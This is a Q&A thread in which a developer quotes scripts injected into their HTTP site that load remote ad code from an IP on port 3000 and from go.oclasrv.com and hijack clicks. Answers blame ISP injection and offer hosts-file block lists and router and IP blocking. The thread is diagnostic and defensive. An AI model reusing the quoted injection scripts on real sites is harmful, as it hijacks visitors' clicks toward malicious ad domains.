unknown scripts are running and redirecting on click to unknown websties

Question

Problem:- Sometimes, on clicking on NAVBAR menu or on any div on my bootstrap website, It redirects to ads or unknown links in new tab something like this.

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

Imported links from hosted file:-

<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>


    <link rel="stylesheet" type="text/css" href="css\style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>

What I got in Inspection:-

I checked my code multiple times when there is no redirect on clicking menu..I found nothing suspicious... BUT THEN when I got redirect links on click, I checked my code in browser and I can clearly see few script sources added to my files( Can see in Inspection mode in browsers only).They are not Written to my code. Unknown parts of my code are..

1) HERE The following 2 scripts are replacing script js/jquery.min.js in head tag

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2) This one is being added to body tag right after I imported google api

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>

3) This one is also in body tag.

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>

4) On inspecting The redirect link. The HEADERS info:-

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

What I have tried:-

My code is clean and there is no script which is redirecting it to somewhere. It may be my browser or Windows being compromised .I checked website from 3 browsers EDGE, CHROME, FIREFOX .. got same problem. then I upgraded to Windows 10 from Win7 and did a fresh install. But nothing happened. Then I thought of asking Hostgator support if server is compromised they replied its okay from their end... I installed malwarebytes and all softwares to solve it...but they just notify that chrome / firefox / Edge is redirecting to outbound ID with some domain name mostly go.oclasrv.com and do nothing.

**

ANY SOLUTION???

**

UPDATE:-

I got similar redirect on Hostgator support feedback link..

On noticing, Here the domain name in string is replaced by rateus.in zoneid=1492761 is same whatever unsecure link I open.. also cb=xxxxxxxxxxxx and tm=xxxxxxxxxxx is changed for different links and fingerprint=c2VwLW5vLXJlZGlyZWN0 is same for all links I open.

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

My OS is completely upgraded to WIN10 pro and I have installed only Chrome without any plugins...

The problem is browser independent as I got same results on EDGE and Firefox.

ANY JS EXPERT WHO CAN HELP ME OUT HERE

Answer 1

Block this URL http://117.254.84.212:3000 seems more effective

In Router

Answer 2

Adguard has fixed this as referenced here to block the clickjacking. The script can be seen in action in Mobile Browsers, opening New Tab advertisements.

Update your Adguard Filters to latest version to see

Answer 3

Simply block the URL (bsnl IP injecting these ads) from your router's security section. For me bsnl URL was http://117.254.84.212

Answer 4

Good Catch!

BSNL servers have been corrupting or infecting with Malware / Virus day-by-day due to poor security

There was naganoadigei.com was registered explicitly to serve malware and redirect users to phishing sites.

Recently on February 2019, they had resolved the issue. But unfortunately the new type of ad based redirects found that was humparsi.com as of in the month February 2019

You may have a look at whether the site has been infected or not by visiting Sucuri

---

Alternatively, you can block the outgoing request by your standalone system in DNS entry

Navigate to %windir%\System32\drivers\etc and edit the hosts file in elevated mode / with Admin authorization and add these lines to your hosts file

0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com

The above sites are not secured with SSL

To Block specific IP address you do it by blocking outgoing bounds in the firewall

In order to cut down the impact or any unlikely adverse effects, you can block the JavaScript by installing Add-ons such as NoScript or ScriptSafe and HTTPS Everywhere

To find out which application uses the IP address with the port number assigned:

C:\Windows\system32>netstat -anob

Answer 5

This seems to be a case of ISP injecting JavaScript files. Are you by any chance on the BSNL broadband?. For last few days, BSNL seems to be injecting Adware on HTTP(non encrypted) sites.

The only solution I know is to host your site on https OR change your ISP.

Answer 6

If you see unknown script injected from following IPs, then it is the script file injected by BSNL ISP.

61.0.245.90, 117.205.13.171

These scripts are injected only when you visit HTTP websites. HTTPS involves Transport Layer Security so it can not be tampered by ISP.

The script files from this IP is just a conduit, which downloads further AD scripts from different AD media. Most of this AD media follows intrusive advertising by hijacking user mouse clicks to open their popups.

BSNL excuse for such activity is that it is a feature to enhance the browsing experience for their subscribers. There is a detailed post written on BSNL injecting such scripts and how to stop those.

Answer 7

This issue that you are having is server-side. Likely nothing is wrong with your code, however the server is infected with malware injecting this bad code into your website.

To solve this, I would make a backup of the code you wrote, change your FTP hosting passwords, erase your server, and add your code back. If this does not solve the problem, then I would change hosting providers.